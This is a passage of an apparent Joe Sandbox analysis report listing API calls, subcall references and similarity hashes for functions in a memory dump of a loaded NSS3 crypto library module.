  • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
• PR_GetCurrentThread.NSS3 ref: 6C49C8B2
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
• PK11_Authenticate.NSS3(?,00000001,?), ref: 6C49C8D0
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49C8EB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
• String ID:
• API String ID: 999015661-0
• Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
• Instruction ID: 6901fecdbc2a90a81d6296ed7e4307ec161ff570f75dcd4b778f876e9e063529
• Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
• Instruction Fuzzy Hash: 0D01C666E111306BD700E5B96C80EAF3F699B4526EF040139FC08A6B01F751881982E2
APIs
• PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDD4
• realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDFD
• PORT_Alloc_Util.NSS3(?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE14
  • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
  • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
• memcpy.VCRUNTIME140(?,?,6C4E9767,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE33
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
• String ID:
• API String ID: 3903481028-0
• Opcode ID: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
• Instruction ID: d9da81c9dd2e83b0aee59866507e02eea407bfdb42520088129742e7d2e64fef
• Opcode Fuzzy Hash: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
• Instruction Fuzzy Hash: FF11A3B1A04706ABEB10DE65ECC4F46B3A8EB8035EF204535E92987F01E331F46687E1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C47DFBF
                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C47DFDB
                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DFFA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47E029
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
• String ID:
• API String ID: 3183882470-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterErrorSectionUnlockValue
• String ID:
• API String ID: 284873373-0
APIs
• PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51AC94
• PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACA6
• free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACC0
• free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACDB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$DestroyFreeK11_Monitor
• String ID:
• API String ID: 3989322779-0
APIs
• CERT_DestroyCertificate.NSS3(?), ref: 6C481DFB
  • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
  • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
  • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
• PR_EnterMonitor.NSS3 ref: 6C481E09
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
  • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(?,?,6C47E175), ref: 6C47E19C
  • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(6C47E175), ref: 6C47E1AA
  • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E208
  • Part of subcall function 6C47E190: PL_HashTableRemove.NSS3(?), ref: 6C47E219
  • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E231
  • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E249
  • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E257
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481E37
• PR_ExitMonitor.NSS3 ref: 6C481E4A
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
• String ID:
• API String ID: 499896158-0
APIs
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481D75
• PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C481D89
• PORT_ZAlloc_Util.NSS3(00000010), ref: 6C481D9C
• free.MOZGLUE(00000000), ref: 6C481DB8
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Alloc_Util$Errorfree
• String ID:
• API String ID: 939066016-0
APIs
• PR_CallOnce.NSS3(6C5D2F88,6C500660,00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500860
  • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
  • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
  • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• TlsGetValue.KERNEL32(00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500874
• EnterCriticalSection.KERNEL32(00000001), ref: 6C500884
• PR_Unlock.NSS3 ref: 6C5008A3
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterSectionUnlockValue$CallOnce
• String ID:
• API String ID: 2502187247-0
• Opcode ID: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
• Instruction ID: fb1afb20aee20782f39640c4915f9dbffe3bd620b3dac81fd70977822274f37a
• Opcode Fuzzy Hash: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
• Instruction Fuzzy Hash: DD012075F00345ABEB012F25DC459557734FF9731DF0A0566EC0895E01EB21A85487DA
APIs
• PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
  • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
  • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
• PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
• memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
• free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Alloc_Util$Valuefreemallocmemcpy
• String ID:
• API String ID: 2335489644-0
• Opcode ID: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
• Instruction ID: b159cc6bc64904850b851daaf08d87b681b4f4f20b6774381fdacfa487cc01e2
• Opcode Fuzzy Hash: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
• Instruction Fuzzy Hash: 75F0C8B97022029BFB049B55DC90D177B68EF84799B148074ED0A8BB11E721E815C7F2
APIs
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalDeleteSectionfree
• String ID:
• API String ID: 2988086103-0
• Opcode ID: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
• Instruction ID: fa08770f15aa3320f578dab9c4c8310cdd2965014aaa963566d5d1bec089dd16
• Opcode Fuzzy Hash: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
• Instruction Fuzzy Hash: 89E06576700A089FCA10EFA9DC48C8B77BCEE492743160529E691C7700D332F905CBE5
APIs
• sqlite3_value_text.NSS3 ref: 6C469E1F
  • Part of subcall function 6C4213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C421413
  • Part of subcall function 6C4213C0: memcpy.VCRUNTIME140(00000000,R#?l,00000002,?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C4214C0
Strings
• ESCAPE expression must be a single character, xrefs: 6C469F78
• LIKE or GLOB pattern too complex, xrefs: 6C46A006
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memcpysqlite3_value_textstrlen
• String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
• API String ID: 2453365862-264706735
• Opcode ID: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
• Instruction ID: 7d19a83c14f88cd0d4b50a8bbde62d55eecf76556bdb4b22734f570e9796106a
• Opcode Fuzzy Hash: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
• Instruction Fuzzy Hash: 8C811970A046518BD704CF26C480FA9B7F2AF95319F198659D8A48BFC9D773D847C790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD037,00000000), ref: 6C4E59C8
                                                                                                                                                                                                                            • Part of subcall function 6C4E7EE0: PR_SetError.NSS3(00000000,00000000,00000002,?,?), ref: 6C4E7F30
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD0AE,00000000), ref: 6C4E59E9
                                                                                                                                                                                                                            • Part of subcall function 6C4EAA40: PR_SetError.NSS3(00000000,00000000,00000008,?,?), ref: 6C4EAAA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Error
• String ID: nXl
• API String ID: 2619118453-2538165799
• Opcode ID: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
• Instruction ID: a36d0762691404302dfa3af20d4dab6dea458ec58737c445554d8883df001155
• Opcode Fuzzy Hash: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
• Instruction Fuzzy Hash: DD41A4716083019FD710DF14DC85F9B73A8AB4832AF564629FD599B782E770E908CBE1
APIs
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C4D57
• PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C4C4DE6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ErrorR_snprintf
• String ID: %d.%d
• API String ID: 2298970422-3954714993
• Opcode ID: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
• Instruction ID: bce491581265a025431ac02413924f763edbf379fa0a1b2c1a4bb7a2a0b011fa
• Opcode Fuzzy Hash: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
• Instruction Fuzzy Hash: FF31D6B6E042186BEB10EBA19C01FFF7768EF80349F050429ED159B791EB319905CBE6
APIs
• SECOID_FindOIDByTag_Util.NSS3('8Nl,00000000,00000000,?,?,6C4E3827,?,00000000), ref: 6C4E4D0A
  • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
• SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C4E4D22
  • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
Strings
Similarity
• API ID: Util$Equal_ErrorFindItemsTag_memcmp
• String ID: '8Nl
• API String ID: 1521942269-472363851
• Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
• Instruction ID: faaf1da02f076401c36e61d6fa22b85c5f9c96ca1c42ad876172112f7ffff881
• Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
• Instruction Fuzzy Hash: 94F0623260123467EB108DAAAC80F8737DC9B496FFF161271ED28CBB91E621DC0586E1
APIs
• PR_GetUniqueIdentity.NSS3(SSL), ref: 6C50AF78
  • Part of subcall function 6C46ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46ACE2
  • Part of subcall function 6C46ACC0: malloc.MOZGLUE(00000001), ref: 6C46ACEC
  • Part of subcall function 6C46ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C46AD02
  • Part of subcall function 6C46ACC0: TlsGetValue.KERNEL32 ref: 6C46AD3C
  • Part of subcall function 6C46ACC0: calloc.MOZGLUE(00000001,?), ref: 6C46AD8C
  • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46ADC0
  • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46AE8C
  • Part of subcall function 6C46ACC0: free.MOZGLUE(?), ref: 6C46AEAB
• memcpy.VCRUNTIME140(6C5D3084,6C5D02AC,00000090), ref: 6C50AF94
Strings
Similarity
• API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
• String ID: SSL
• API String ID: 2424436289-2135378647
• Opcode ID: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
• Instruction ID: e23d0bc0c6a8536e72d1d913debf15ea6bdcd3e84c37e453e18f9f461038c29f
• Opcode Fuzzy Hash: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
• Instruction Fuzzy Hash: 732143B6706B48DACB00EF51AD837127AF2B343708B529129C1199BF25D73172489FEE
APIs
• PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
  • Part of subcall function 6C461370: GetSystemInfo.KERNEL32(?,?,?,?,6C460936,?,6C460F20,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000), ref: 6C46138F
• PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
  • Part of subcall function 6C461110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461130
  • Part of subcall function 6C461110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461142
  • Part of subcall function 6C461110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001), ref: 6C461167
Strings
Similarity
• API ID: InfoModulePageSecureSizeSystemcallocstrdup
• String ID: clock
• API String ID: 536403800-3195780754
• Opcode ID: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
• Instruction ID: ae073eea65f042f11a716f09c1e9e84661f58f9c18057ff458f0a46d82beb7c7
• Opcode Fuzzy Hash: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
• Instruction Fuzzy Hash: 90D0223160020415C600A297AC45F9AB2BCC7C327AF00082AE00882E048B2574EBC2AD
APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                                                          • Opcode ID: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                          • Instruction ID: 9faeb92f070ff0a36f6b37508af881ab9ec881005d8387683d97c9dab4499168
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31A070A457968BDB00FF39C854E5977A4BF06309F03462DD8888BB11DB30E485CA89
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4D0F5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2332725481-0
                                                                                                                                                                                                                          • Opcode ID: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                          • Instruction ID: e88bea8112d22613ed99f8c3dea35be1ec8f558f1d98004385a495c7f9564372
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 900128B1E012909BE710B73A9D04E567AACEF82259B130129EC18C7A21E770E805C2E7
                                                                                                                                                                                                                          APIs
